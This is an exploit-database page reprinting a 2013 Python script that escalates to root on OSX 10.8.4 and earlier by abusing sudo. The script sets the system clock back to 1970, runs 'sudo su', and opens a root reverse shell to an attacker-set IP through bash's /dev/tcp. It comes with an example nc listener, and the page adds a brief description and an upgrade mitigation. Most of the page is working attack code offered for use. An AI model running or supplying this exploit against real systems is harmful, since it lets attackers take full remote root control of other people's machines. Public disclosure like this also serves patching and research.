OSX - exploit.company

vendor:

OSX

by:

David Kennedy

9,3

CVSS

HIGH

Privilege Escalation

N/A

CWE

Product Name: OSX

Affected Version From: OSX <= 10.8.4

Affected Version To: OSX <= 10.8.4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OSX

2013

OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell

This exploit is a local privilege escalation vulnerability in OSX versions prior to 10.8.4. It allows an attacker to gain root access to the system by exploiting a flaw in the sudo command. The exploit works by setting the system time to a specific date and time, then running the sudo command with a malicious command. The malicious command will open a reverse shell to the attacker's IP address and port, allowing the attacker to gain root access to the system.

Mitigation:

Upgrade to OSX 10.8.4 or later.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Original MSF Module: 
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb

###################################################################################################
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py 
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
#
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2# 
###################################################################################################
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
print """
###############################################################
#
# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)